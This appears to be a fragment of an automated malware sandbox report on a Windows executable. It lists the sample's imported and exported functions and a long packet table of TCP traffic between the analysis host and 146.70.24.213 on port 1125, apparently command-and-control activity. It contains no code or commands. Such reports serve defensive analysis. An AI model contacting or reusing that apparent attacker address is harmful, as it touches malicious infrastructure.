oleaut32.dll	SafeArrayGetElemsize, SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
oleaut32.dll	GetErrorInfo, SysFreeString
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
comctl32.dll	InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
user32.dll	EnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
shell32.dll	Shell_NotifyIconW
winspool.drv	OpenPrinterW, EnumPrintersW, DocumentPropertiesW, ClosePrinter
winspool.drv	GetDefaultPrinterW

Exports

Name	Ordinal	Address
TMethodImplementationIntercept	3	0x4991b0
__dbk_fcall_wrapper	2	0x417300
dbkFCallWrapperAddr	1	0x8a1f58

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 11, 2024 16:53:05.863054991 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:05.868313074 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:05.868416071 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:05.869153976 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:05.874092102 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:06.696666956 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:06.697221041 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:06.697329044 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:08.704670906 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:08.709882021 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:08.709980965 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:08.715009928 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:08.867379904 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:08.914247036 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:08.942254066 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:08.954762936 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:08.959743977 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:08.959845066 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:08.964899063 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.070842981 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.117343903 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.204994917 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.205296040 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.210371971 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.210431099 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.215917110 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.216562033 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.221422911 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.221487999 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.226387024 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.336935043 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.342206001 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.342300892 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.347101927 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.462908983 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.463041067 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.463102102 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.463099957 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.463113070 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.463129044 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.463186026 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.463207006 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.463217020 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.463227034 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.463253975 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.463277102 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.463897943 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.463933945 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.463979006 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.464067936 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.464138985 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.464148998 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.464186907 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.464549065 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.464565992 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.464605093 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.465210915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.465254068 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.467910051 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.508002996 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.554255962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.554291964 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.554302931 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.554307938 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.554313898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.554325104 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.554392099 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.554392099 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.554445028 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.554461956 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.554478884 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.554488897 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.554498911 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.554502010 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.554511070 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.554526091 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.554554939 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.555361986 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.555372000 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.555394888 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.555403948 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.555416107 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.555421114 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.555428028 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.555444956 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.555465937 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.556289911 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.556338072 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.556379080 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.556468964 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.556478977 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.556488037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.556519032 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.556855917 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.556866884 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.556876898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:09.556895018 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:09.556916952 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.036329985 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.036353111 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.036366940 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.036428928 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.036453962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.036470890 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.036504030 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.036612034 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.036628008 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.036653042 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.037336111 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.037378073 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.037480116 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.037820101 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.037859917 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.037959099 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038034916 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038074970 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.038177967 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038388968 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038429976 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.038557053 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038573980 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038589001 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038604975 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038618088 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038623095 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.038636923 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038642883 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.038654089 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038670063 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038683891 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.038708925 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.038718939 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038743973 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038758039 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038774967 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038780928 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.038790941 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038806915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038814068 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.038834095 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038846016 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.038861036 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038876057 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038891077 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038899899 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.038906097 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038923025 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038928986 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.038939953 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038957119 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038971901 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038975000 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.038988113 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.038995028 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.039009094 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.039025068 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.039026976 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.039041996 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.039057970 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.039061069 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.039073944 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.039093971 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.039094925 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.039112091 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.039134026 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.039145947 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.039160967 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.039199114 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.039314032 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.054157972 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.059333086 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.059389114 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.064634085 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.113859892 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.118882895 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.118942022 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.123838902 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.229475021 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.234591961 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.234663963 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.240278006 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.353984118 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.398632050 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.485006094 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.539345980 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.619031906 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.624097109 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.624171019 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.630956888 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.742654085 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.789323092 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.832987070 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.882966995 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.945647001 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.951153040 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:10.951330900 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:10.956878901 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:11.070694923 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:11.117445946 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:11.161257029 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:11.211199045 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:11.273685932 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:11.279021025 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:11.279102087 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:11.284580946 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:11.398601055 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:11.445455074 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:11.488873959 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:11.539232016 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:11.601823092 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:11.606829882 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:11.606918097 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:11.611805916 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:11.746526003 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:11.789323092 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:11.836755037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:11.892724037 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:11.961401939 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:11.966640949 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:11.966684103 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:11.972084045 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:12.086199999 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:12.132950068 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:12.177249908 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:12.226712942 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:12.289274931 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:12.294874907 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:12.294929981 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:12.299942970 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:12.414676905 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:12.461097956 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:12.505685091 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:12.554830074 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:12.617425919 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:12.622769117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:12.622945070 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:12.627908945 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:12.742378950 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:12.789239883 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:12.834044933 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:12.882977009 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:12.991744041 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:12.997575998 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:12.997668982 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:13.002918959 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:13.117422104 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:13.164330959 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:13.208072901 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:13.257977962 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:13.320502996 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:13.325928926 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:13.325980902 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:13.330885887 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:13.736511946 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:13.736587048 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:13.736725092 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:13.736916065 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:13.736968994 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:13.851789951 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:13.856877089 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:13.856933117 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:13.861893892 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:13.961057901 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:14.008284092 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:14.051282883 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:14.101720095 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:14.180047035 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:14.185121059 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:14.185214996 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:14.190157890 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:14.305672884 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:14.351707935 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:14.396559000 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:14.445455074 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:14.508516073 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:14.513537884 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:14.513631105 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:14.518630981 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:14.633115053 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:14.679828882 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:14.724045038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:14.773580074 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:14.836239100 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:14.841753960 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:14.841820955 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:14.846869946 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:14.961710930 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:15.007953882 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:15.051898003 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:15.101702929 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:15.176083088 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:15.181608915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:15.182585955 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:15.187480927 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:15.305449963 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:15.351735115 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:15.395829916 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:15.445492983 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:15.592669964 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:15.597839117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:15.598550081 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:15.603441000 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:15.711374998 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:15.757966995 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:15.801799059 CEST	1125	49730	146.70.24.213	192.168.2.4
